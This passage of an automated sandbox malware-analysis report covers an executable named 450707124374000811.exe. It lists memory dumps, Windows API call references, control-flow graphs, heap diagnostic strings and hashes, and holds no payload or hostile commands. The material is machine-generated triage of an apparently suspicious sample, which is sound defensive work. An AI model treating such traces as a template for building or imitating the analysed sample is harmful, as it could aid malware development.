                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 1100898210-823278215
                                                              • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                              • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                              • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                              • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-1246513382
                                                              • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                              • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                              • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                              • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                              • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                              • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                              • GlobalFree.KERNEL32(?), ref: 10001203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                               • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                              • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                              • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                              • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                              • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                              • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                              • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

                                                              Execution Graph

                                                              Execution Coverage:0%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:100%
                                                              Total number of Nodes:1
                                                              Total number of Limit Nodes:0
                                                              execution_graph 82239 35982c70 LdrInitializeThunk

                                                              Control-flow Graph

                                                              control_flow_graph 2 359835c0-359835cc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e0d5c4ec7da17b26861603e37e4c8d3f67dcf5701b80f71c84a0b5c23d9b817a
                                                              • Instruction ID: a070307c7fa854fde1d6e6c7d786a35df58acb33b642cb8e00866dd79be03e9d
                                                              • Opcode Fuzzy Hash: e0d5c4ec7da17b26861603e37e4c8d3f67dcf5701b80f71c84a0b5c23d9b817a
                                                              • Instruction Fuzzy Hash: 1490023260660402D10471584518746101947D0201FA5C496A0428528D879A8A5565A7

                                                              Control-flow Graph

                                                              control_flow_graph 1 35982df0-35982dfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 90e895160a9f4628166002351f5bb95bf2d8e9a2c9ab526baa55bf76924aaeae
                                                              • Instruction ID: b3bb32c35d72509471547f72398709e8981341148fcafefb013247d0808e9569
                                                              • Opcode Fuzzy Hash: 90e895160a9f4628166002351f5bb95bf2d8e9a2c9ab526baa55bf76924aaeae
                                                              • Instruction Fuzzy Hash: CE90023220250413D11571584508747001D47D0241FD5C497A0428518D965B8A56A126

                                                              Control-flow Graph

                                                              control_flow_graph 0 35982c70-35982c7c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3ce8f7c3343a699a5f53d92c524abc5c34730f30c1948aa5b5c195113872cc48
                                                              • Instruction ID: b1f1ff91ae3a634845639fb522d56056a9536b5021e1dee09b38e16c81f5aa9c
                                                              • Opcode Fuzzy Hash: 3ce8f7c3343a699a5f53d92c524abc5c34730f30c1948aa5b5c195113872cc48
                                                              • Instruction Fuzzy Hash: A790023220258802D1147158840878A001947D0301F99C496A4428618D869A89957126

                                                              Control-flow Graph

                                                              control_flow_graph 96 359ffcab-359ffcc3 GetPEB 97 359ffcc5-359ffce0 GetPEB call 3593b970 96->97 98 359ffce2-359ffce3 call 3593b970 96->98 102 359ffce8-359ffd0a call 3593b970 97->102 98->102 105 359ffd0c 102->105 106 359ffd81-359ffd8a GetPEB 102->106 107 359ffd3d-359ffd42 105->107 108 359ffd7c 105->108 109 359ffd1a-359ffd1f 105->109 110 359ffd59-359ffd5e 105->110 111 359ffd36-359ffd3b 105->111 112 359ffd75-359ffd7a 105->112 113 359ffd13-359ffd18 105->113 114 359ffd52-359ffd57 105->114 115 359ffd2f-359ffd34 105->115 116 359ffd6e-359ffd73 105->116 117 359ffd4b-359ffd50 105->117 118 359ffd28-359ffd2d 105->118 119 359ffd67-359ffd6c 105->119 120 359ffd44-359ffd49 105->120 121 359ffd21-359ffd26 105->121 122 359ffd60-359ffd65 105->122 123 359ffd8c-359ffda7 GetPEB call 3593b970 106->123 124 359ffda9-359ffdaa call 3593b970 106->124 107->106 108->106 109->106 110->106 111->106 112->106 113->106 114->106 115->106 116->106 117->106 118->106 119->106 120->106 121->106 122->106 128 359ffdaf-359ffdca call 3593b970 123->128 124->128 131 359ffe0d-359ffe13 128->131 132 359ffdcc-359ffdd5 GetPEB 128->132 133 359ffe56-359ffe5c 131->133 134 359ffe15-359ffe1e GetPEB 131->134 135 359ffdd7-359ffdf2 GetPEB call 3593b970 132->135 136 359ffdf4-359ffdf5 call 3593b970 132->136 141 359ffe9f-359ffea5 133->141 142 359ffe5e-359ffe67 GetPEB 133->142 139 359ffe3d-359ffe3e call 3593b970 134->139 140 359ffe20-359ffe3b GetPEB call 3593b970 134->140 143 359ffdfa-359ffe0c call 3593b970 135->143 136->143 158 359ffe43-359ffe55 call 3593b970 139->158 140->158 145 359ffeaf-359ffeb8 GetPEB 141->145 146 359ffea7-359ffead 141->146 149 359ffe69-359ffe84 GetPEB call 3593b970 142->149 150 359ffe86-359ffe87 call 3593b970 142->150 143->131 154 359ffeba-359ffed5 GetPEB call 3593b970 145->154 155 359ffed7-359ffed8 call 3593b970 145->155 146->145 153 359ffef7-359fff00 GetPEB 146->153 163 359ffe8c-359ffe9e call 3593b970 149->163 150->163 161 359fff1f-359fff20 call 3593b970 153->161 162 359fff02-359fff1d GetPEB call 3593b970 153->162 169 359ffedd-359ffef4 call 3593b970 154->169 155->169 158->133 176 359fff25-359fff3a call 3593b970 161->176 162->176 163->141 169->153
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                              • API String ID: 0-2897834094
                                                              • Opcode ID: 2fed00379b4732c7268deee5244f9eff42f7dc5b5407b6d286fbcf89b3e85352
                                                              • Instruction ID: 49be65a6f96548d77c05899e6ab5d46bd129a138e1aac56a1a171ee2309ca7e7
                                                              • Opcode Fuzzy Hash: 2fed00379b4732c7268deee5244f9eff42f7dc5b5407b6d286fbcf89b3e85352
                                                              • Instruction Fuzzy Hash: EC61B17352B341DFD211DB58D88BD1573F9EB0473AB0B40AAE9049B252EA7AEC91CF41

                                                              Control-flow Graph

                                                              control_flow_graph 554 359e94e0-359e9529 555 359e952b-359e9530 554->555 556 359e9578-359e9587 554->556 558 359e9534-359e953a 555->558 557 359e9589-359e958e 556->557 556->558 559 359e9d13-359e9d27 call 35984c30 557->559 560 359e9695-359e96bd call 35989020 558->560 561 359e9540-359e9564 call 35989020 558->561 570 359e96bf-359e96da call 359e9d2a 560->570 571 359e96dc-359e9712 560->571 568 359e9566-359e9573 call 35a0972b 561->568 569 359e9593-359e9634 GetPEB call 359edc65 561->569 580 359e967d-359e9690 RtlDebugPrintTimes 568->580 581 359e9636-359e9644 569->581 582 359e9652-359e9667 569->582 575 359e9714-359e9716 570->575 571->575 575->559 579 359e971c-359e9731 RtlDebugPrintTimes 575->579 579->559 589 359e9737-359e973e 579->589 580->559 581->582 583 359e9646-359e964b 581->583 582->580 584 359e9669-359e966e 582->584 583->582 587 359e9673-359e9676 584->587 588 359e9670 584->588 587->580 588->587 589->559 590 359e9744-359e975f 589->590 591 359e9763-359e9774 call 359ea808 590->591 594 359e977a-359e977c 591->594 595 359e9d11 591->595 594->559 596 359e9782-359e9789 594->596 595->559 597 359e978f-359e9794 596->597 598 359e98fc-359e9902 596->598 599 359e97bc 597->599 600 359e9796-359e979c 597->600 601 359e9a9c-359e9aa2 598->601 602 359e9908-359e9937 call 35989020 598->602 606 359e97c0-359e9811 call 35989020 RtlDebugPrintTimes 599->606 600->599 605 359e979e-359e97b2 600->605 603 359e9af4-359e9af9 601->603 604 359e9aa4-359e9aad 601->604 615 359e9939-359e9944 602->615 616 359e9970-359e9985 602->616 610 359e9aff-359e9b07 603->610 611 359e9ba8-359e9bb1 603->611 604->591 609 359e9ab3-359e9aef call 35989020 604->609 612 359e97b8-359e97ba 605->612 613 359e97b4-359e97b6 605->613 606->559 648 359e9817-359e981b 606->648 633 359e9ce9 609->633 619 359e9b09-359e9b0d 610->619 620 359e9b13-359e9b3d call 359e8513 610->620 611->591 617 359e9bb7-359e9bba 611->617 612->606 613->606 622 359e994f-359e996e 615->622 623 359e9946-359e994d 615->623 627 359e9987-359e9989 616->627 628 359e9991-359e9998 616->628 624 359e9c7d-359e9cb4 call 35989020 617->624 625 359e9bc0-359e9c0a 617->625 619->611 619->620 645 359e9d08-359e9d0c 620->645 646 359e9b43-359e9b9e call 35989020 RtlDebugPrintTimes 620->646 632 359e99d9-359e99f6 RtlDebugPrintTimes 622->632 623->622 658 359e9cbb-359e9cc2 624->658 659 359e9cb6 624->659 630 359e9c0c 625->630 631 359e9c11-359e9c1e 625->631 634 359e998f 627->634 635 359e998b-359e998d 627->635 636 359e99bd-359e99bf 628->636 630->631 642 359e9c2a-359e9c2d 631->642 643 359e9c20-359e9c23 631->643 632->559 663 359e99fc-359e9a1f call 35989020 632->663 644 359e9ced 633->644 634->628 635->628 640 359e999a-359e99a4 636->640 641 359e99c1-359e99d7 636->641 655 359e99ad 640->655 656 359e99a6 640->656 641->632 653 359e9c2f-359e9c32 642->653 654 359e9c39-359e9c7b 642->654 643->642 652 359e9cf1-359e9d06 RtlDebugPrintTimes 644->652 645->591 646->559 687 359e9ba4 646->687 649 359e981d-359e9825 648->649 650 359e986b-359e9880 648->650 660 359e9827-359e9850 call 359e8513 649->660 661 359e9852-359e9869 649->661 662 359e9886-359e9894 650->662 652->559 652->645 653->654 654->652 666 359e99af-359e99b1 655->666 656->641 664 359e99a8-359e99ab 656->664 667 359e9ccd 658->667 668 359e9cc4-359e9ccb 658->668 659->658 671 359e9898-359e98ef call 35989020 RtlDebugPrintTimes 660->671 661->662 662->671 685 359e9a3d-359e9a58 663->685 686 359e9a21-359e9a3b 663->686 664->666 674 359e99bb 666->674 675 359e99b3-359e99b5 666->675 669 359e9cd1-359e9cd7 667->669 668->669 676 359e9cde-359e9ce4 669->676 677 359e9cd9-359e9cdc 669->677 671->559 690 359e98f5-359e98f7 671->690 674->636 675->674 682 359e99b7-359e99b9 675->682 676->644 683 359e9ce6 676->683 677->633 682->636 683->633 688 359e9a5d-359e9a8b RtlDebugPrintTimes 685->688 686->688 687->611 688->559 692 359e9a91-359e9a97 688->692 690->645 692->617
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $ $0
                                                              • API String ID: 3446177414-3352262554
                                                              • Opcode ID: 95b9ce9de971c987cec54e953bf733163a3901ce5804e4d87dc05ec515f997a5
                                                              • Instruction ID: c037e474d8af42a476f790dfbfa8b794d0c8f923bd921d4572e4af8e83572733
                                                              • Opcode Fuzzy Hash: 95b9ce9de971c987cec54e953bf733163a3901ce5804e4d87dc05ec515f997a5
                                                              • Instruction Fuzzy Hash: 783214B16083818FE311CF68C884B5BBBF9BB88344F04492EF9D987251D7B5E949CB52

                                                              Control-flow Graph

                                                              control_flow_graph 1297 359f0274-359f0296 call 35997e54 1300 359f0298-359f02b0 RtlDebugPrintTimes 1297->1300 1301 359f02b5-359f02cd call 359376b2 1297->1301 1305 359f0751-359f0760 1300->1305 1306 359f06f7 1301->1306 1307 359f02d3-359f02e9 1301->1307 1308 359f06fa-359f074e call 359f0766 1306->1308 1309 359f02eb-359f02ee 1307->1309 1310 359f02f0-359f02f2 1307->1310 1308->1305 1311 359f02f3-359f030a 1309->1311 1310->1311 1313 359f06b1-359f06ba GetPEB 1311->1313 1314 359f0310-359f0313 1311->1314 1318 359f06bc-359f06d7 GetPEB call 3593b970 1313->1318 1319 359f06d9-359f06de call 3593b970 1313->1319 1314->1313 1316 359f0319-359f0322 1314->1316 1320 359f033e-359f0351 call 359f0cb5 1316->1320 1321 359f0324-359f033b call 3594ffb0 1316->1321 1324 359f06e3-359f06f4 call 3593b970 1318->1324 1319->1324 1332 359f035c-359f0370 call 3593758f 1320->1332 1333 359f0353-359f035a 1320->1333 1321->1320 1324->1306 1336 359f0376-359f0382 GetPEB 1332->1336 1337 359f05a2-359f05a7 1332->1337 1333->1332 1339 359f0384-359f0387 1336->1339 1340 359f03f0-359f03fb 1336->1340 1337->1308 1338 359f05ad-359f05b9 GetPEB 1337->1338 1341 359f05bb-359f05be 1338->1341 1342 359f0627-359f0632 1338->1342 1345 359f0389-359f03a4 GetPEB call 3593b970 1339->1345 1346 359f03a6-359f03ab call 3593b970 1339->1346 1343 359f04e8-359f04fa call 359527f0 1340->1343 1344 359f0401-359f0408 1340->1344 1348 359f05dd-359f05e2 call 3593b970 1341->1348 1349 359f05c0-359f05db GetPEB call 3593b970 1341->1349 1342->1308 1353 359f0638-359f0643 1342->1353 1367 359f0590-359f059d call 359f11a4 call 359f0cb5 1343->1367 1368 359f0500-359f0507 1343->1368 1344->1343 1352 359f040e-359f0417 1344->1352 1356 359f03b0-359f03d1 call 3593b970 GetPEB 1345->1356 1346->1356 1366 359f05e7-359f05fb call 3593b970 1348->1366 1349->1366 1359 359f0419-359f0429 1352->1359 1360 359f0438-359f043c 1352->1360 1353->1308 1361 359f0649-359f0654 1353->1361 1356->1343 1386 359f03d7-359f03eb 1356->1386 1359->1360 1369 359f042b-359f0435 call 359fdac6 1359->1369 1362 359f044e-359f0454 1360->1362 1363 359f043e-359f044c call 35973bc9 1360->1363 1361->1308 1370 359f065a-359f0663 GetPEB 1361->1370 1374 359f0457-359f0460 1362->1374 1363->1374 1398 359f05fe-359f0608 GetPEB 1366->1398 1367->1337 1377 359f0509-359f0510 1368->1377 1378 359f0512-359f051a 1368->1378 1369->1360 1371 359f0665-359f0680 GetPEB call 3593b970 1370->1371 1372 359f0682-359f0687 call 3593b970 1370->1372 1395 359f068c-359f06ac call 359e86ba call 3593b970 1371->1395 1372->1395 1384 359f0472-359f0475 1374->1384 1385 359f0462-359f0470 1374->1385 1377->1378 1388 359f051c-359f052c 1378->1388 1389 359f0538-359f053c 1378->1389 1396 359f0477-359f047e 1384->1396 1397 359f04e5 1384->1397 1385->1384 1386->1343 1388->1389 1399 359f052e-359f0533 call 359fdac6 1388->1399 1392 359f053e-359f0551 call 35973bc9 1389->1392 1393 359f056c-359f0572 1389->1393 1411 359f0563 1392->1411 1412 359f0553-359f0561 call 3596fe99 1392->1412 1404 359f0575-359f057c 1393->1404 1395->1398 1396->1397 1403 359f0480-359f048b 1396->1403 1397->1343 1398->1308 1405 359f060e-359f0622 1398->1405 1399->1389 1403->1397 1409 359f048d-359f0496 GetPEB 1403->1409 1404->1367 1410 359f057e-359f058e 1404->1410 1405->1308 1414 359f0498-359f04b3 GetPEB call 3593b970 1409->1414 1415 359f04b5-359f04ba call 3593b970 1409->1415 1410->1367 1417 359f0566-359f056a 1411->1417 1412->1417 1423 359f04bf-359f04dd call 359e86ba call 3593b970 1414->1423 1415->1423 1417->1404 1423->1397
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 3446177414-1700792311
                                                              • Opcode ID: 37bd86b51f34d49e8c8d4470adf117232023b59c9be797d5d70254b45a5906ce
                                                              • Instruction ID: ad8e25214708ccb477055c79c7bf1efb555982746f088176e99a026e257b7455
                                                              • Opcode Fuzzy Hash: 37bd86b51f34d49e8c8d4470adf117232023b59c9be797d5d70254b45a5906ce
                                                              • Instruction Fuzzy Hash: F2D12175618785DFDB12CF68C801AADBBFAFF49319F068049E4469B252DB36E941CF10
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                              • API String ID: 3446177414-1745908468
                                                              • Opcode ID: 4a963923eac23dfeb527e78c7205beaec6a52d21be4ef9e183befaa4bb4d930c
                                                              • Instruction ID: c00563dc68d10f1314e722bfb10d76daf2a09de09b9dd02513920ea1d235d7f1
                                                              • Opcode Fuzzy Hash: 4a963923eac23dfeb527e78c7205beaec6a52d21be4ef9e183befaa4bb4d930c
                                                              • Instruction Fuzzy Hash: 7C912436A04744DFDB02CFA8C441AADBBF2FF49754F15805AE446AB262CB35E941CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                              • API String ID: 0-3591852110
                                                              • Opcode ID: 6b39cb75c0f617b5899f851e97ec61d4aac95656400c0ec63adf4ee4ea6c85b9
                                                              • Instruction ID: 5a55afc6bcc4433606dae839e6e2537008d263fb7b6fede13aeeb47e008dde72
                                                              • Opcode Fuzzy Hash: 6b39cb75c0f617b5899f851e97ec61d4aac95656400c0ec63adf4ee4ea6c85b9
                                                              • Instruction Fuzzy Hash: 59120F74604782DFE725CF24C441BBABBF6FF09316F458459E4868B642E736E880EB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
